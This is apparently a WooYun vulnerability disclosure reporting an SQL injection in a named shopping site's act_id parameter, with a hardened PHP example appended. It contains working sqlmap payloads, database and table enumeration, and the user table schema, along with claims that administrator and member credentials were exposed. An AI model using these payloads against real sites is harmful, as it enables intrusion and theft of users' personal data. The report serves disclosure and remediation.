Vulnerability summary

Defect ID: wooyun-2014-084637

Title: SQL injection on a shopping platform leaks sensitive information

Vendor: 经典购

Author: an0nym0u5

Submitted: 2014-11-25 17:24

Fix date: 2015-01-09 17:26

Disclosed: 2015-01-09 17:26

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 13

Status: Vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2014-11-25: Actively contacting the vendor and waiting for them to claim the report; details withheld from the public
2015-01-09: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

SQL injection

Details:

Site: http://www.whjdsc.com/

[Screenshot: jd1.jpg]


Injection point: http://www.whjdsc.com/goods_sales.php?act_id=4
Injected parameter: act_id
The database can be dumped directly, leaking sensitive information about administrators and members.

Proof of vulnerability:

GET parameter 'act_id' is vulnerable. Do you want to keep testing the others? [y/N] y
sqlmap identified the following injection points with a total of 28 HTTP(s) requests:
---
Place: GET
Parameter: act_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: act_id=4 AND 2021=2021
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: act_id=4 AND (SELECT 8873 FROM(SELECT COUNT(*),CONCAT(CHAR(58,122,115,107,58),(SELECT (CASE WHEN (8873=8873) THEN 1 ELSE 0 END)),CHAR(58,102,112,121,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
---
[12:14:01] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: PHP 5.2.6, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
[12:14:01] [INFO] fetching database names
[12:14:01] [INFO] the SQL query used returns 2 entries
[12:14:01] [INFO] retrieved: information_schema
[12:14:01] [INFO] retrieved: whjdsc
available databases [2]:
[*] information_schema
[*] whjdsc


Clearly whjdsc is the database of interest:

Database: whjdsc
[91 tables]
+-------------------------+
| ecs_account_log |
| ecs_ad |
| ecs_ad_custom |
| ecs_ad_position |
| ecs_admin_action |
| ecs_admin_log |
| ecs_admin_message |
| ecs_admin_user |
| ecs_adsense |
| ecs_affiliate_log |
| ecs_agency |
| ecs_area_region |
| ecs_article |
| ecs_article_cat |
| ecs_attribute |
| ecs_auction_log |
| ecs_auto_manage |
| ecs_back_goods |
| ecs_back_order |
| ecs_bonus_type |
| ecs_booking_goods |
| ecs_brand |
| ecs_card |
| ecs_cart |
| ecs_cat_recommend |
| ecs_category |
| ecs_collect_goods |
| ecs_comment |
| ecs_crons |
| ecs_delivery_goods |
| ecs_delivery_order |
| ecs_email_list |
| ecs_email_sendlist |
| ecs_error_log |
| ecs_exchange_goods |
| ecs_favourable_activity |
| ecs_feedback |
| ecs_friend_link |
| ecs_goods |
| ecs_goods_activity |
| ecs_goods_article |
| ecs_goods_attr |
| ecs_goods_cat |
| ecs_goods_gallery |
| ecs_goods_type |
| ecs_goods_visiter |
| ecs_group_goods |
| ecs_keywords |
| ecs_link_goods |
| ecs_mail_templates |
| ecs_member_price |
| ecs_nav |
| ecs_order_action |
| ecs_order_goods |
| ecs_order_info |
| ecs_pack |
| ecs_package_goods |
| ecs_pay_log |
| ecs_payment |
| ecs_plugins |
| ecs_products |
| ecs_reg_extend_info |
| ecs_reg_fields |
| ecs_region |
| ecs_role |
| ecs_searchengine |
| ecs_sessions |
| ecs_sessions_data |
| ecs_shipping |
| ecs_shipping_area |
| ecs_shop_config |
| ecs_snatch_log |
| ecs_stats |
| ecs_suppliers |
| ecs_tag |
| ecs_template |
| ecs_topic |
| ecs_user_account |
| ecs_user_address |
| ecs_user_bonus |
| ecs_user_feed |
| ecs_user_rank |
| ecs_users |
| ecs_virtual_card |
| ecs_volume_price |
| ecs_vote |
| ecs_vote_log |
| ecs_vote_option |
| ecs_wholesale |
| ecs_zxcomment |
| neworder |
+-------------------------+


There are many tables here; the important ones are ecs_admin_user and ecs_users:

[Screenshot: jd2.jpg]


The administrator account names and passwords are already exposed. Next, the ecs_users table:

Database: whjdsc
Table: ecs_users
[35 columns]
+-----------------+------------------------+
| Column | Type |
+-----------------+------------------------+
| address_id | mediumint(8) unsigned |
| aite_id | text |
| alias | varchar(60) |
| answer | varchar(255) |
| birthday | date |
| credit_line | decimal(10,2) unsigned |
| ec_salt | varchar(10) |
| email | varchar(60) |
| flag | tinyint(3) unsigned |
| frozen_money | decimal(10,2) |
| home_phone | varchar(20) |
| is_special | tinyint(3) unsigned |
| is_validated | tinyint(3) unsigned |
| last_ip | varchar(15) |
| last_login | int(11) unsigned |
| last_time | datetime |
| mobile_phone | varchar(20) |
| msn | varchar(60) |
| office_phone | varchar(20) |
| parent_id | mediumint(9) |
| passwd_answer | varchar(255) |
| passwd_question | varchar(50) |
| password | varchar(32) |
| pay_points | int(10) unsigned |
| qq | varchar(20) |
| question | varchar(255) |
| rank_points | int(10) unsigned |
| reg_time | int(10) unsigned |
| salt | varchar(10) |
| sex | tinyint(1) unsigned |
| user_id | mediumint(8) unsigned |
| user_money | decimal(10,2) |
| user_name | varchar(60) |
| user_rank | tinyint(3) unsigned |
| visit_count | smallint(5) unsigned |
+-----------------+------------------------+


All of the user details are here. A partial listing:

[12:52:18] [INFO] fetching columns 'user_name, password, user_id, mobile_phone
entries for table 'ecs_users' on database 'whjdsc'
[12:52:18] [INFO] the SQL query used returns 145 entries


This is enough to demonstrate the impact; testing stops here.

Remediation:

Strictly validate the act_id parameter.
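As an added illustration of the remediation (this is not the site's own code), a hypothetical goods_sales.php handler written the vulnerable way, beside a hardened version that validates act_id as an integer and binds it as a query parameter. The table name ecs_goods_activity comes from the dump above; that goods_sales.php queries it by an act_id column, and the $db PDO handle, are assumptions.

```php
<?php
// Added example, not the vendor's code. Assumes a PDO connection $db to the
// whjdsc database and that ecs_goods_activity has an act_id column (assumption).

// Vulnerable pattern: act_id is concatenated into the query unchanged, so a
// value such as "4 AND 2021=2021" (the report's boolean-based payload) is
// executed as SQL instead of being treated as a number.
function goods_sales_vulnerable(PDO $db, array $get)
{
    $act_id = isset($get['act_id']) ? $get['act_id'] : '';
    $sql = "SELECT * FROM ecs_goods_activity WHERE act_id = " . $act_id;
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened version: reject anything that is not a positive integer before
// touching the database, then bind the value so no part of it is parsed as SQL.
function goods_sales_fixed(PDO $db, array $get)
{
    $raw = isset($get['act_id']) ? $get['act_id'] : '';
    $act_id = filter_var($raw, FILTER_VALIDATE_INT,
                         array('options' => array('min_range' => 1)));
    if ($act_id === false) {
        // "4 AND 2021=2021" and the error-based payload both fail here.
        throw new InvalidArgumentException('act_id must be a positive integer');
    }
    $stmt = $db->prepare("SELECT * FROM ecs_goods_activity WHERE act_id = ?");
    $stmt->bindValue(1, $act_id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}
```

The input check alone would stop the payloads shown in this report, but the bound parameter is what removes the injection class entirely, including for string parameters where integer validation does not apply.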

Copyright notice: when reposting, cite the source: an0nym0u5@乌云


Vulnerability response

Vendor response:

Vendor could not be reached, or the vendor actively declined to respond